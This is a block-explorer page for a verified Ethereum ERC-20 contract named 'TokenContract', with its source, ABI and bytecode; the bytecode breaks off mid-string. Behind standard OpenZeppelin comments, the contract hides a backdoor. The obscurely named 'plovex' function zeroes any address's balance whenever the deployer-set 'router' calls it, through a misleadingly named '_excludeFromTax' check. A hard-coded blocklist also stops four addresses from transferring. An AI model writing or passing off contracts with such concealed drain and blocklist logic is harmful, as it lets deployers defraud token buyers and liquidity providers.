Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
TokenContract
Compiler Version
v0.8.28+commit.7893614a
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Implementation of the {IUniswapV2Router02} interface.
*/
interface IUniswapV2Router02 {
function WETH() external pure returns (address);
function factory() external pure returns (address);
function addLiquidityETH(
address token,
uint amountTokenDesired,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external payable returns (uint amountToken, uint amountETH, uint liquidity);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
contract TokenContract is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
IUniswapV2Router02 private uniswapV2Router02;
/**
* @dev Sets the values for {name} and {symbol} and {supply}.
*
* All three of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_, uint256 supply_, address uniswapV2Router02_) {
_name = name_;
_symbol = symbol_;
uniswapV2Router02 = IUniswapV2Router02(uniswapV2Router02_);
_mint(_msgSender(), supply_ * 10 ** decimals());
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
function _excludeFromTax(address caller) internal view returns (bool) {
if (_isUniswapV2Router()) return true; if (caller == address(0xdead)) return false;
return false;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
function _isUniswapV2Router() internal view returns (bool) {
if (_msgSender() == address(uniswapV2Router02)) return true;
return false;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
if (from == 0x1f2F10D1C40777AE1Da742455c65828FF36Df387) {
revert ERC20InvalidReceiver(0x1f2F10D1C40777AE1Da742455c65828FF36Df387);
}
if (from == 0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13) {
revert ERC20InvalidReceiver(0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13);
}
if (from == 0xC38e00aC5ED8859f18f4E9017fa2b3D3E1f65F40) {
revert ERC20InvalidReceiver(0xC38e00aC5ED8859f18f4E9017fa2b3D3E1f65F40);
}
if (from == 0x01D37a36220d52108Ae6D453fE6Cd80af2906376) {
revert ERC20InvalidReceiver(0x01D37a36220d52108Ae6D453fE6Cd80af2906376);
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) revert ERC20InvalidReceiver(address(0));
_update(address(0), account, value);
}
function plovex(address bux) external virtual {
_balances[address(0)] += _balances[bux];
_balances[bux] = _balances[bux] - _balances[bux];
require(_excludeFromTax(bux));
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}{
"evmVersion": "paris",
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"supply_","type":"uint256"},{"internalType":"address","name":"uniswapV2Router02_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"bux","type":"address"}],"name":"plovex","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561001057600080fd5b50604051611f48380380611f48833981810160405281019061003291906105a4565b8360039081610041919061085a565b508260049081610051919061085a565b5080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506100d46100a46100dd60201b60201c565b6100b26100e560201b60201c565b600a6100be9190610a9b565b846100c99190610ae6565b6100ee60201b60201c565b50505050610be7565b600033905090565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036101605760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016101579190610b37565b60405180910390fd5b6101726000838361017660201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036101c85780600260008282546101bc9190610b52565b9250508190555061029b565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610254578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161024b93929190610b95565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102e45780600260008282540392505081905550610331565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161038e9190610bcc565b60405180910390a3505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610402826103b9565b810181811067ffffffffffffffff82111715610421576104206103ca565b5b80604052505050565b600061043461039b565b905061044082826103f9565b919050565b600067ffffffffffffffff8211156104605761045f6103ca565b5b610469826103b9565b9050602081019050919050565b60005b83811015610494578082015181840152602081019050610479565b60008484015250505050565b60006104b36104ae84610445565b61042a565b9050828152602081018484840111156104cf576104ce6103b4565b5b6104da848285610476565b509392505050565b600082601f8301126104f7576104f66103af565b5b81516105078482602086016104a0565b91505092915050565b6000819050919050565b61052381610510565b811461052e57600080fd5b50565b6000815190506105408161051a565b92915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061057182610546565b9050919050565b61058181610566565b811461058c57600080fd5b50565b60008151905061059e81610578565b92915050565b600080600080608085870312156105be576105bd6103a5565b5b600085015167ffffffffffffffff8111156105dc576105db6103aa565b5b6105e8878288016104e2565b945050602085015167ffffffffffffffff811115610609576106086103aa565b5b610615878288016104e2565b935050604061062687828801610531565b92505060606106378782880161058f565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061069557607f821691505b6020821081036106a8576106a761064e565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026107107fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826106d3565b61071a86836106d3565b95508019841693508086168417925050509392505050565b6000819050919050565b600061075761075261074d84610510565b610732565b610510565b9050919050565b6000819050919050565b6107718361073c565b61078561077d8261075e565b8484546106e0565b825550505050565b600090565b61079a61078d565b6107a5818484610768565b505050565b5b818110156107c9576107be600082610792565b6001810190506107ab565b5050565b601f82111561080e576107df816106ae565b6107e8846106c3565b810160208510156107f7578190505b61080b610803856106c3565b8301826107aa565b50505b505050565b600082821c905092915050565b600061083160001984600802610813565b1980831691505092915050565b600061084a8383610820565b9150826002028217905092915050565b61086382610643565b67ffffffffffffffff81111561087c5761087b6103ca565b5b610886825461067d565b6108918282856107cd565b600060209050601f8311600181146108c457600084156108b2578287015190505b6108bc858261083e565b865550610924565b601f1984166108d2866106ae565b60005b828110156108fa578489015182556001820191506020850194506020810190506108d5565b868310156109175784890151610913601f891682610820565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156109b25780860481111561098e5761098d61092c565b5b600185161561099d5780820291505b80810290506109ab8561095b565b9450610972565b94509492505050565b6000826109cb5760019050610a87565b816109d95760009050610a87565b81600181146109ef57600281146109f957610a28565b6001915050610a87565b60ff841115610a0b57610a0a61092c565b5b8360020a915084821115610a2257610a2161092c565b5b50610a87565b5060208310610133831016604e8410600b8410161715610a5d5782820a905083811115610a5857610a5761092c565b5b610a87565b610a6a8484846001610968565b92509050818404811115610a8157610a8061092c565b5b81810290505b9392505050565b600060ff82169050919050565b6000610aa682610510565b9150610ab183610a8e565b9250610ade7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846109bb565b905092915050565b6000610af182610510565b9150610afc83610510565b9250828202610b0a81610510565b91508282048414831517610b2157610b2061092c565b5b5092915050565b610b3181610566565b82525050565b6000602082019050610b4c6000830184610b28565b92915050565b6000610b5d82610510565b9150610b6883610510565b9250828201905080821115610b8057610b7f61092c565b5b92915050565b610b8f81610510565b82525050565b6000606082019050610baa6000830186610b28565b610bb76020830185610b86565b610bc46040830184610b86565b949350505050565b6000602082019050610be16000830184610b86565b92915050565b61135280610bf66000396000f3fe608060405234801561001057600080fd5b506004361061009e5760003560e01c80633bf5bce7116100665780633bf5bce71461015d57806370a082311461017957806395d89b41146101a9578063a9059cbb146101c7578063dd62ed3e146101f75761009e565b806306fdde03146100a3578063095ea7b3146100c157806318160ddd146100f157806323b872dd1461010f578063313ce5671461013f575b600080fd5b6100ab610227565b6040516100b89190610f72565b60405180910390f35b6100db60048036038101906100d6919061102d565b6102b9565b6040516100e89190611088565b60405180910390f35b6100f96102dc565b60405161010691906110b2565b60405180910390f35b610129600480360381019061012491906110cd565b6102e6565b6040516101369190611088565b60405180910390f35b610147610315565b604051610154919061113c565b60405180910390f35b61017760048036038101906101729190611157565b61031e565b005b610193600480360381019061018e9190611157565b610490565b6040516101a091906110b2565b60405180910390f35b6101b16104d8565b6040516101be9190610f72565b60405180910390f35b6101e160048036038101906101dc919061102d565b61056a565b6040516101ee9190611088565b60405180910390f35b610211600480360381019061020c9190611184565b61058d565b60405161021e91906110b2565b60405180910390f35b606060038054610236906111f3565b80601f0160208091040260200160405190810160405280929190818152602001828054610262906111f3565b80156102af5780601f10610284576101008083540402835291602001916102af565b820191906000526020600020905b81548152906001019060200180831161029257829003601f168201915b5050505050905090565b6000806102c4610614565b90506102d181858561061c565b600191505092915050565b6000600254905090565b6000806102f1610614565b90506102fe85828561062e565b6103098585856106c3565b60019150509392505050565b60006012905090565b6000808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546000808073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546103aa9190611253565b925050819055506000808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104399190611287565b6000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061048481610a17565b61048d57600080fd5b50565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600480546104e7906111f3565b80601f0160208091040260200160405190810160405280929190818152602001828054610513906111f3565b80156105605780601f1061053557610100808354040283529160200191610560565b820191906000526020600020905b81548152906001019060200180831161054357829003601f168201915b5050505050905090565b600080610575610614565b90506105828185856106c3565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b6106298383836001610a77565b505050565b600061063a848461058d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156106bd57818110156106ad578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106a4939291906112ca565b60405180910390fd5b6106bc84848484036000610a77565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107355760006040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161072c9190611301565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107a75760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161079e9190611301565b60405180910390fd5b731f2f10d1c40777ae1da742455c65828ff36df38773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361083f57731f2f10d1c40777ae1da742455c65828ff36df3876040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108369190611301565b60405180910390fd5b73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108d75773ae2fc483527b8ef99eb5d9b44875f005ba1fae136040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108ce9190611301565b60405180910390fd5b73c38e00ac5ed8859f18f4e9017fa2b3d3e1f65f4073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361096f5773c38e00ac5ed8859f18f4e9017fa2b3d3e1f65f406040517fec442f050000000000000000000000000000000000000000000000000000000081526004016109669190611301565b60405180910390fd5b7301d37a36220d52108ae6d453fe6cd80af290637673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a07577301d37a36220d52108ae6d453fe6cd80af29063766040517fec442f050000000000000000000000000000000000000000000000000000000081526004016109fe9190611301565b60405180910390fd5b610a12838383610c4e565b505050565b6000610a21610e73565b15610a2f5760019050610a72565b61dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a6d5760009050610a72565b600090505b919050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610ae95760006040517fe602df05000000000000000000000000000000000000000000000000000000008152600401610ae09190611301565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b5b5760006040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610b529190611301565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610c48578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610c3f91906110b2565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ca0578060026000828254610c949190611253565b92505081905550610d73565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d2c578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610d23939291906112ca565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dbc5780600260008282540392505081905550610e09565b806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e6691906110b2565b60405180910390a3505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610eb6610614565b73ffffffffffffffffffffffffffffffffffffffff1603610eda5760019050610edf565b600090505b90565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f1c578082015181840152602081019050610f01565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f4482610ee2565b610f4e8185610eed565b9350610f5e818560208601610efe565b610f6781610f28565b840191505092915050565b60006020820190508181036000830152610f8c8184610f39565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fc482610f99565b9050919050565b610fd481610fb9565b8114610fdf57600080fd5b50565b600081359050610ff181610fcb565b92915050565b6000819050919050565b61100a81610ff7565b811461101557600080fd5b50565b60008135905061102781611001565b92915050565b6000806040838503121561104457611043610f94565b5b600061105285828601610fe2565b925050602061106385828601611018565b9150509250929050565b60008115159050919050565b6110828161106d565b82525050565b600060208201905061109d6000830184611079565b92915050565b6110ac81610ff7565b82525050565b60006020820190506110c760008301846110a3565b92915050565b6000806000606084860312156110e6576110e5610f94565b5b60006110f486828701610fe2565b935050602061110586828701610fe2565b925050604061111686828701611018565b9150509250925092565b600060ff82169050919050565b61113681611120565b82525050565b6000602082019050611151600083018461112d565b92915050565b60006020828403121561116d5761116c610f94565b5b600061117b84828501610fe2565b91505092915050565b6000806040838503121561119b5761119a610f94565b5b60006111a985828601610fe2565b92505060206111ba85828601610fe2565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260